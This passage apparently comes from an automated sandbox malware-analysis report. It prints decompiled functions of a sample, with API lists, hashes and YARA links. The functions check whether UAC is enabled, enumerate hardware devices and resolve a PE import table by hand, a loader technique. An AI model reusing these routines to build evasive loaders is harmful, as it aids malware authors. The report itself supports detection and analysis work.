                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                  • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                  • API String ID: 199729137-398595594
                                                                                                                                                                  • Opcode ID: 7edffb9465eb3a766c6251c0ab95df316e23b5577e0af73232a57825c1b2b81b
                                                                                                                                                                  • Instruction ID: 9391ebd7240fd7acb90a188370869bf68d339becc9c828c0075270ff4901721a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7edffb9465eb3a766c6251c0ab95df316e23b5577e0af73232a57825c1b2b81b
                                                                                                                                                                  • Instruction Fuzzy Hash: B1F04933A4833267E7226A696C0671775A0DF09757F1122B7FD00E6251D6ACCD00C5DE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D2A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001D2A0() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}








                                                                                                                                                                  0x1001d2a6
                                                                                                                                                                  0x1001d2ad
                                                                                                                                                                  0x1001d2b4
                                                                                                                                                                  0x1001d2bb
                                                                                                                                                                  0x1001d2c2
                                                                                                                                                                  0x1001d2e6
                                                                                                                                                                  0x1001d307
                                                                                                                                                                  0x1001d312
                                                                                                                                                                  0x1001d312
                                                                                                                                                                  0x1001d319
                                                                                                                                                                  0x1001d319
                                                                                                                                                                  0x1001d325

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 1001D2F6
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                                  • API String ID: 3677997916-2194944742
                                                                                                                                                                  • Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100118DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E100118DF(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10334594);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10334590);
					_t11 =  *(TlsGetValue( *0x10334594))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10334590);
				 *((intOrPtr*)(E1001158A( *0x10335480)))();
				_push(_t11);
				L100117AC(_t9, _t11, _t15, _t16);
				_t5 =  *0x10334594; // 0x20
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}








                                                                                                                                                                  0x100118df
                                                                                                                                                                  0x100118ec
                                                                                                                                                                  0x100118ee
                                                                                                                                                                  0x100118f0
                                                                                                                                                                  0x100118f2
                                                                                                                                                                  0x10011902
                                                                                                                                                                  0x10011902
                                                                                                                                                                  0x10011904
                                                                                                                                                                  0x10011905
                                                                                                                                                                  0x10011907
                                                                                                                                                                  0x10011919
                                                                                                                                                                  0x1001191b
                                                                                                                                                                  0x1001191c
                                                                                                                                                                  0x10011922
                                                                                                                                                                  0x1001192a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001192f
                                                                                                                                                                  0x10011935

                                                                                                                                                                  APIs
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118EC
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118FE
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011913
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000020,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550,0000000C,1000EC47), ref: 1001192F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$__decode_pointer
                                                                                                                                                                  • String ID: tj
                                                                                                                                                                  • API String ID: 3389472636-3491506833
                                                                                                                                                                  • Opcode ID: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction ID: 5ea32f06f5c113a557663da0afc6a555ab05ec8127c22f0ad06d45371975ea5c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction Fuzzy Hash: 25E06D3A800120AFFA059B759CC4B693F6AFBCA661F110111F12CDE0B2DE31ECA29A00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100199C0, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                  			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E100031F0( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff);
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF80(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF80(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380);
						_t85 = E100197E0(_t116, _t182);
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380);
						_t88 = E100197E0(_t116, _t183);
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380);
						_t91 = E100197E0(_t116, _t184);
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380);
						_t94 = E100197E0(_t116, _t185);
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380);
						_t97 = E100197E0(_t116, _t186);
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380);
				}
				E10003220(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003300( &_v1368);
				 *[fs:0x0] = _v16;
				return _a4;
			}




















































                                                                                                                                                                  0x100199c0
                                                                                                                                                                  0x100199d1
                                                                                                                                                                  0x100199d8
                                                                                                                                                                  0x100199e0
                                                                                                                                                                  0x100199f0
                                                                                                                                                                  0x100199f5
                                                                                                                                                                  0x100199fc
                                                                                                                                                                  0x10019a06
                                                                                                                                                                  0x10019a0d
                                                                                                                                                                  0x10019a1f
                                                                                                                                                                  0x10019a25
                                                                                                                                                                  0x10019a32
                                                                                                                                                                  0x10019a40
                                                                                                                                                                  0x10019a45
                                                                                                                                                                  0x10019a48
                                                                                                                                                                  0x10019a4f
                                                                                                                                                                  0x10019a53
                                                                                                                                                                  0x10019a5a
                                                                                                                                                                  0x10019a61
                                                                                                                                                                  0x10019a69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019a7d
                                                                                                                                                                  0x10019a8b
                                                                                                                                                                  0x10019a8f
                                                                                                                                                                  0x10019a90
                                                                                                                                                                  0x10019a92
                                                                                                                                                                  0x10019a9a
                                                                                                                                                                  0x10019a9f
                                                                                                                                                                  0x10019a9f
                                                                                                                                                                  0x10019aa7
                                                                                                                                                                  0x10019aa8
                                                                                                                                                                  0x10019aad
                                                                                                                                                                  0x10019ab0
                                                                                                                                                                  0x10019ab2
                                                                                                                                                                  0x10019ac6
                                                                                                                                                                  0x10019ad1
                                                                                                                                                                  0x10019ad2
                                                                                                                                                                  0x10019ad7
                                                                                                                                                                  0x10019ad7
                                                                                                                                                                  0x10019ae0
                                                                                                                                                                  0x10019ae4
                                                                                                                                                                  0x10019ae5
                                                                                                                                                                  0x10019ae7
                                                                                                                                                                  0x10019aef
                                                                                                                                                                  0x10019af4
                                                                                                                                                                  0x10019af4
                                                                                                                                                                  0x10019afc
                                                                                                                                                                  0x10019afd
                                                                                                                                                                  0x10019b02
                                                                                                                                                                  0x10019b05
                                                                                                                                                                  0x10019b07
                                                                                                                                                                  0x10019b1b
                                                                                                                                                                  0x10019b26
                                                                                                                                                                  0x10019b27
                                                                                                                                                                  0x10019b2c
                                                                                                                                                                  0x10019b2c
                                                                                                                                                                  0x10019b35
                                                                                                                                                                  0x10019b39
                                                                                                                                                                  0x10019b3a
                                                                                                                                                                  0x10019b3c
                                                                                                                                                                  0x10019b44
                                                                                                                                                                  0x10019b49
                                                                                                                                                                  0x10019b49
                                                                                                                                                                  0x10019b51
                                                                                                                                                                  0x10019b52
                                                                                                                                                                  0x10019b57
                                                                                                                                                                  0x10019b5a
                                                                                                                                                                  0x10019b5c
                                                                                                                                                                  0x10019b70
                                                                                                                                                                  0x10019b7b
                                                                                                                                                                  0x10019b7c
                                                                                                                                                                  0x10019b81
                                                                                                                                                                  0x10019b81
                                                                                                                                                                  0x10019b8a
                                                                                                                                                                  0x10019b8e
                                                                                                                                                                  0x10019b8f
                                                                                                                                                                  0x10019b91
                                                                                                                                                                  0x10019b99
                                                                                                                                                                  0x10019b9e
                                                                                                                                                                  0x10019b9e
                                                                                                                                                                  0x10019ba6
                                                                                                                                                                  0x10019ba7
                                                                                                                                                                  0x10019bac
                                                                                                                                                                  0x10019baf
                                                                                                                                                                  0x10019bb1
                                                                                                                                                                  0x10019bc5
                                                                                                                                                                  0x10019bd0
                                                                                                                                                                  0x10019bd1
                                                                                                                                                                  0x10019bd6
                                                                                                                                                                  0x10019bd6
                                                                                                                                                                  0x10019bdf
                                                                                                                                                                  0x10019be3
                                                                                                                                                                  0x10019be4
                                                                                                                                                                  0x10019be6
                                                                                                                                                                  0x10019bee
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bfb
                                                                                                                                                                  0x10019bfc
                                                                                                                                                                  0x10019c01
                                                                                                                                                                  0x10019c04
                                                                                                                                                                  0x10019c06
                                                                                                                                                                  0x10019c1a
                                                                                                                                                                  0x10019c25
                                                                                                                                                                  0x10019c26
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c37
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c6b
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c79
                                                                                                                                                                  0x10019c7f
                                                                                                                                                                  0x10019c8c
                                                                                                                                                                  0x10019c97
                                                                                                                                                                  0x10019ca3

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A40
                                                                                                                                                                  • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A7D
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                    • Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                    • Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3323326763-0
                                                                                                                                                                  • Opcode ID: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
                                                                                                                                                                  • Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
                                                                                                                                                                  • Opcode Fuzzy Hash: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001ABC0, Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001ABC0(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18);
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}




























                                                                                                                                                                  0x1001abc9
                                                                                                                                                                  0x1001abcc
                                                                                                                                                                  0x1001abcf
                                                                                                                                                                  0x1001abe0
                                                                                                                                                                  0x1001abea
                                                                                                                                                                  0x1001abfe
                                                                                                                                                                  0x1001ac0c
                                                                                                                                                                  0x1001ac12
                                                                                                                                                                  0x1001ac18
                                                                                                                                                                  0x1001ac1a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac20
                                                                                                                                                                  0x1001ac23
                                                                                                                                                                  0x1001ac27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac30
                                                                                                                                                                  0x1001ac41
                                                                                                                                                                  0x1001ac44
                                                                                                                                                                  0x1001ac46
                                                                                                                                                                  0x1001ac49
                                                                                                                                                                  0x1001ac4c
                                                                                                                                                                  0x1001ac50
                                                                                                                                                                  0x1001ac69
                                                                                                                                                                  0x1001ac73
                                                                                                                                                                  0x1001ac77
                                                                                                                                                                  0x1001ac7a
                                                                                                                                                                  0x1001ac7b
                                                                                                                                                                  0x1001ac80
                                                                                                                                                                  0x1001ac83
                                                                                                                                                                  0x1001ac86
                                                                                                                                                                  0x1001ac8a
                                                                                                                                                                  0x1001acbc
                                                                                                                                                                  0x1001acc2
                                                                                                                                                                  0x1001acc8
                                                                                                                                                                  0x1001acce
                                                                                                                                                                  0x1001acd4
                                                                                                                                                                  0x1001acdd
                                                                                                                                                                  0x1001ace3
                                                                                                                                                                  0x1001ace6
                                                                                                                                                                  0x1001ad0a
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad16
                                                                                                                                                                  0x1001ace8
                                                                                                                                                                  0x1001acf0
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001ad2d
                                                                                                                                                                  0x1001ad30
                                                                                                                                                                  0x1001ad33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad3a
                                                                                                                                                                  0x1001ad40
                                                                                                                                                                  0x1001ad72
                                                                                                                                                                  0x1001ad78
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad8a
                                                                                                                                                                  0x1001ad8d
                                                                                                                                                                  0x1001ad8f
                                                                                                                                                                  0x1001ad95
                                                                                                                                                                  0x1001ad42
                                                                                                                                                                  0x1001ad45
                                                                                                                                                                  0x1001ad5b
                                                                                                                                                                  0x1001ad5e
                                                                                                                                                                  0x1001ad60
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad9a
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001ad21
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001adad
                                                                                                                                                                  0x1001adb1
                                                                                                                                                                  0x1001ac06
                                                                                                                                                                  0x1001ac06
                                                                                                                                                                  0x1001ac09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac09
                                                                                                                                                                  0x1001adb6
                                                                                                                                                                  0x1001adc1
                                                                                                                                                                  0x1001adc4
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001ac8f
                                                                                                                                                                  0x1001ac9a
                                                                                                                                                                  0x1001ac9d
                                                                                                                                                                  0x1001aca4
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001ac54
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4100373531-0
